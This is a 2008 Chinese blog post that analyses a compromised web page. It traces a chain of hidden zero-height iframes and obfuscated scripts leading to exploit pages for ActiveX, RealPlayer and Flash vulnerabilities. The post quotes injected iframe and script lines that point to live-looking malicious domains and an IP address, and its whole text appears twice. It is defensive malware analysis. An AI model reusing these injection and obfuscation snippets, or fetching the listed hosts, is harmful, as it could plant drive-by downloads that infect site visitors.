对一个挂马网页的简单分析
2008-11-29 17:48
309 查看
【注意:下面的任意网址都不要在浏览器中直接访问】[/b][/b]
对挂马网址http://www.may925.com/news.asp?id=58 的分析
分析人:magictong 日期:2008/11/26
利用的漏洞:
1、Microsoft Office Snapshot Viewer ActiveX 漏洞
2、MS06014漏洞
3、新浪UC DLoader Class ActiveX控件漏洞
4、UUsee控件漏洞
5、迅雷漏洞
6、联众漏洞
7、Real漏洞
分析过程:
news.asp[/b]
通过旋风下载这个网址后得到网页文件news.asp。
【注:不要用迅雷下载,否则会重定向到一个另外的正常网址,下载到的网页也不是我们所需要的】
第四行有段代码为:
<script language="javascript" src="http://css.acmetoy.com/css.js?tid=11&pid=80"></script>
将 http://css.acmetoy.com/css.js?tid=11&pid=80 下载下来得到一个js脚本文件css.js。
news.asp->css.js[/b]
这个脚本文件不长,里面是通过js嵌入了两个iframe到网页中,第二个iframe是个网页流量计数器。第一个iframe的宽高都被设置为0,比较明显的挂马。
document.write('<iframe src=http://www.sllcnmb.cn/jzll/20.htm width=50 height=0 border=0></iframe>');
将http://www.sllcnmb.cn/jzll/20.htm 下载下来获得网页文件20.htm
news.asp->css.js->20.htm(1)[/b]
这个网页的主要有两行代码,先看第一个我们感兴趣的行<Iframe src="http://wm.sllwbd5.cn/a75/fxx.htm" width=100 height=0></Iframe>,将里面的网址下载下来获得网页fxx.htm
news.asp->css.js->20.htm(1)->fxx.htm[/b]
这个网页比较复杂一点,里面有iframe间接调用的,也有直接的漏洞攻击,下面一个个的来看。
news.asp->css.js->20.htm(1)->fxx.htm->fx.htm[/b]
document.write("<Iframe width=100 height=0 src=fx.htm></iframe>"),下载得到网页文件fx.htm,这个网页很恶心,是一个脚本,而且是出错得脚本(相应window.onerror消息),也就是你的js出错了,也会中木马。然后下面判断了下浏览器的类型,如果是IE内核,下载ilink.html,如果是ff则下载flink.html。
[/b]
news.asp->css.js->20.htm(1)->fxx.htm->fx.htm->ilink.html,flink.html[/b]
这两个文件基本一样,只是针对不同的浏览器的,看下ilink.html,里面全是类似的flash漏洞攻击代码(还判断了flash的版本)。
news.asp->css.js->20.htm(1)->fxx.htm->ss.htm[/b]
这个文件里面有new ActiveXObject("snpvw.Snapshot Viewer Control.1"),这是Microsoft Office Snapshot Viewer ActiveX 漏洞利用代码。
news.asp->css.js->20.htm(1)->fxx.htm->mso6014.htm[/b]
document.write("<iframe width=50 height=0 src=MS06014.htm></iframe>");将MS06014.htm下载下来,这个是利用ms06014漏洞的挂马代码,里面居然是VBS的脚本。
news.asp->css.js->20.htm(1)->fxx.htm->[/b] sina.htm[/b]
var hw=new ActiveXObject("/x44/x6f/x77/x6e/x6c/x6f/x61/x64/x65/x72/x2e/x44/x4c/x6f/x61/x64/x65/x72/x2e/x31");},转换一下,var hw=new ActiveXObject("downloader.dloader.1 ");},新浪UC DLoader Class ActiveX控件漏洞。
news.asp->css.js->20.htm(1)->fxx.htm->uu.htm[/b]
try{var n;var qxxxxx="dxaaaa";var povjudgqjx="fsdfvjjt";
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};
finally{if(n!="[object Error]"){document.write("");
document.write("<iFrame width=100 height=0 src=http://59.34.216.92/UU.htm></iframe>");}}var ddddddddd="dddddddddds";
开始尝试直接利用UUsee控件的漏洞,如果失败,通过uu.htm网页里面的挂马代码来利用那个uusee。
news.asp->css.js->20.htm(1)->fxx.htm->thunder.html[/b]
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=Thunder.html></iframe>");}}
利用迅雷漏洞。(Thunder.html无法下载)
news.asp->css.js->20.htm(1)->fxx.htm->glworld.html[/b]
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=GLWORLD.html></iframe>");}}
联众漏洞。
news.asp->css.js->20.htm(1)->fxx.htm->real.html,real.htm[/b]
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="/x36/x2e/x30/x2e/x31/x34/x2e/x35/x35/x32")
document.write("<iframe width=100 height=0 src=real.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=Real.html></iframe>");
}
Real的漏洞,判断了real的版本,小于6.0.14.552,引用real.htm,否则引用Real.html。
再回到最开始的news.asp[/b]
news.asp->index.html[/b]
注意到这句<script src=http://%63%63%68%31%2E%63%6E></script>,转换一下为http://cch1.cn,下载之后是index.html,里面有判断了浏览器的类型。
document.write("<Iframe src=http://sllwbd5.cn/a1/ilink.html width=100 height=0></Iframe>");
}
else{document.write("<Iframe src=http://sllwbd5.cn/a1/flink.html width=100 height=0></Iframe>");}
这两个文件和上面说的ilink.html和flink.html内容一样,只是地址不同而已。
news.asp->b2.htm[/b]
再看这句document.writeln("<Iframe src=http:////www.zgynkmh.cn//b2.htm width=50 height=0><//iframe>"),去掉干扰字符之后,得到b2.htm。
news.asp->b2.htm->fxx.htm[/b]
这个网页里面<Iframe src="http://sllwbd5.cn/a1/fxx.htm" width=100 height=0></Iframe>,再次获取fxx.htm,就和上面的一样了。
对挂马网址http://www.may925.com/news.asp?id=58 的分析
分析人:magictong 日期:2008/11/26
利用的漏洞:
1、Microsoft Office Snapshot Viewer ActiveX 漏洞
2、MS06014漏洞
3、新浪UC DLoader Class ActiveX控件漏洞
4、UUsee控件漏洞
5、迅雷漏洞
6、联众漏洞
7、Real漏洞
分析过程:
news.asp[/b]
通过旋风下载这个网址后得到网页文件news.asp。
【注:不要用迅雷下载,否则会重定向到一个另外的正常网址,下载到的网页也不是我们所需要的】
第四行有段代码为:
<script language="javascript" src="http://css.acmetoy.com/css.js?tid=11&pid=80"></script>
将 http://css.acmetoy.com/css.js?tid=11&pid=80 下载下来得到一个js脚本文件css.js。
news.asp->css.js[/b]
这个脚本文件不长,里面是通过js嵌入了两个iframe到网页中,第二个iframe是个网页流量计数器。第一个iframe的宽高都被设置为0,比较明显的挂马。
document.write('<iframe src=http://www.sllcnmb.cn/jzll/20.htm width=50 height=0 border=0></iframe>');
将http://www.sllcnmb.cn/jzll/20.htm 下载下来获得网页文件20.htm
news.asp->css.js->20.htm(1)[/b]
这个网页的主要有两行代码,先看第一个我们感兴趣的行<Iframe src="http://wm.sllwbd5.cn/a75/fxx.htm" width=100 height=0></Iframe>,将里面的网址下载下来获得网页fxx.htm
news.asp->css.js->20.htm(1)->fxx.htm[/b]
这个网页比较复杂一点,里面有iframe间接调用的,也有直接的漏洞攻击,下面一个个的来看。
news.asp->css.js->20.htm(1)->fxx.htm->fx.htm[/b]
document.write("<Iframe width=100 height=0 src=fx.htm></iframe>"),下载得到网页文件fx.htm,这个网页很恶心,是一个脚本,而且是出错得脚本(相应window.onerror消息),也就是你的js出错了,也会中木马。然后下面判断了下浏览器的类型,如果是IE内核,下载ilink.html,如果是ff则下载flink.html。
[/b]
news.asp->css.js->20.htm(1)->fxx.htm->fx.htm->ilink.html,flink.html[/b]
这两个文件基本一样,只是针对不同的浏览器的,看下ilink.html,里面全是类似的flash漏洞攻击代码(还判断了flash的版本)。
news.asp->css.js->20.htm(1)->fxx.htm->ss.htm[/b]
这个文件里面有new ActiveXObject("snpvw.Snapshot Viewer Control.1"),这是Microsoft Office Snapshot Viewer ActiveX 漏洞利用代码。
news.asp->css.js->20.htm(1)->fxx.htm->mso6014.htm[/b]
document.write("<iframe width=50 height=0 src=MS06014.htm></iframe>");将MS06014.htm下载下来,这个是利用ms06014漏洞的挂马代码,里面居然是VBS的脚本。
news.asp->css.js->20.htm(1)->fxx.htm->[/b] sina.htm[/b]
var hw=new ActiveXObject("/x44/x6f/x77/x6e/x6c/x6f/x61/x64/x65/x72/x2e/x44/x4c/x6f/x61/x64/x65/x72/x2e/x31");},转换一下,var hw=new ActiveXObject("downloader.dloader.1 ");},新浪UC DLoader Class ActiveX控件漏洞。
news.asp->css.js->20.htm(1)->fxx.htm->uu.htm[/b]
try{var n;var qxxxxx="dxaaaa";var povjudgqjx="fsdfvjjt";
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};
finally{if(n!="[object Error]"){document.write("");
document.write("<iFrame width=100 height=0 src=http://59.34.216.92/UU.htm></iframe>");}}var ddddddddd="dddddddddds";
开始尝试直接利用UUsee控件的漏洞,如果失败,通过uu.htm网页里面的挂马代码来利用那个uusee。
news.asp->css.js->20.htm(1)->fxx.htm->thunder.html[/b]
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=Thunder.html></iframe>");}}
利用迅雷漏洞。(Thunder.html无法下载)
news.asp->css.js->20.htm(1)->fxx.htm->glworld.html[/b]
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=GLWORLD.html></iframe>");}}
联众漏洞。
news.asp->css.js->20.htm(1)->fxx.htm->real.html,real.htm[/b]
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="/x36/x2e/x30/x2e/x31/x34/x2e/x35/x35/x32")
document.write("<iframe width=100 height=0 src=real.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=Real.html></iframe>");
}
Real的漏洞,判断了real的版本,小于6.0.14.552,引用real.htm,否则引用Real.html。
再回到最开始的news.asp[/b]
news.asp->index.html[/b]
注意到这句<script src=http://%63%63%68%31%2E%63%6E></script>,转换一下为http://cch1.cn,下载之后是index.html,里面有判断了浏览器的类型。
document.write("<Iframe src=http://sllwbd5.cn/a1/ilink.html width=100 height=0></Iframe>");
}
else{document.write("<Iframe src=http://sllwbd5.cn/a1/flink.html width=100 height=0></Iframe>");}
这两个文件和上面说的ilink.html和flink.html内容一样,只是地址不同而已。
news.asp->b2.htm[/b]
再看这句document.writeln("<Iframe src=http:////www.zgynkmh.cn//b2.htm width=50 height=0><//iframe>"),去掉干扰字符之后,得到b2.htm。
news.asp->b2.htm->fxx.htm[/b]
这个网页里面<Iframe src="http://sllwbd5.cn/a1/fxx.htm" width=100 height=0></Iframe>,再次获取fxx.htm,就和上面的一样了。
相关文章推荐
- visual studio 2010下 C# 编写的一个简单的网页源代码分析、链接抓取器
- 分析一个简单C程序的汇编代码,理解计算机是如何工作的
- 一个简单的网页爬虫
- 打开网页自动弹出一个页面的代码分析
- 使用PHP简单网页抓取和内容分析
- 如何做一个简单的Chrome Extension用于网页截屏
- 简单的一个CSS菜单,不用图片也很好看_网页代码站(www.webdm.cn)
- 一个简单的HTML语法分析类
- 结合一个简单的项目分析MVC设计流程
- 最简单的一个网页倒计时代码 时间到期后会显示出提醒内容 收藏版
- 一个网页的Table简单布局
- 可视化数据分析(三) 一个简单的散点图的实现
- 一个 Linux 上分析死锁的简单方法
- 写一个简单的BootLoader(四)——链接文件boot.lds分析笔记
- 利用C#编写一个简单的抓网页应用程序
- 外包网页设计的小活儿,折腾经历的分析,做出一个能用的、可行的东西挺不容易的
- 网页挂马工作原理完全分析
- 一个简单的网页抓取例子
- Linux 内核分析 第二次作业 完成一个简单的时间片轮转多道程序内核代码
- curl入门知识之简单的抓取一个远程网页